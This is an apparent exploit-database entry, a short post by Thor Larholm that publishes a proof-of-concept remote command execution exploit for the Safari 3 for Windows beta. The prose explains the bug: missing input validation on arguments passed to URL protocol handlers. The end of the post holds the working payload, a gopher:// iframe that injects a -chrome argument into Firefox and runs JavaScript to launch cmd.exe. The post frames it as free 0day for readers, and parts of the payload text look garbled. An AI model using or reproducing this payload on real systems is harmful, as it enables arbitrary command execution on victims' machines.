Apple Safari 3 for Windows Beta - Remote Command Execution









Safari for Windows, 0day exploit in 2 hours
By Thor Larholm

The below PoC exploit will exploit Safari by bouncing through Firefox 
via the Gopher protocol, passing on unfiltered input for the -chrome 
argument that Firefox exposes. When it has done this it will launch 
C:\Windows\System32\cmd.exe with any arguments that have been specified 
in the call to the method. 

It is important to know that, even though this PoC exploit uses Firefox, 
the actual vulnerability is within the lack of input validation for the 
command line arguments handed to the various URL protocol handlers on 
your machine. As such, there are a lot of different attack vectors for 
this vulnerability, I simply chose Firefox and the Gopher URL protocol 
because I was familiar with these. 

I hope you enjoyed the fruits of my 2 hours of labour. Please feel free 
to add my RSS feed to your reader and come back again tomorrow or next 
week for a fresh batch of 0day vulnerabilities :) 

Cheers Thor Larholm 

<iframe src='gopher://" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[&#39;;1&#39;].createInstance(I.nsILocalFile);file.initWithPath(&#39;C:&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;Windows&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;System32&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;cmd.exe&#39;);process=C[&#39;;1&#39;].createInstance(I.nsIProcess);process.init(file);;{}&#44;0);alert(process)'></iframe>process.init(file);,{},0);alert(process)

# [2007-06-12]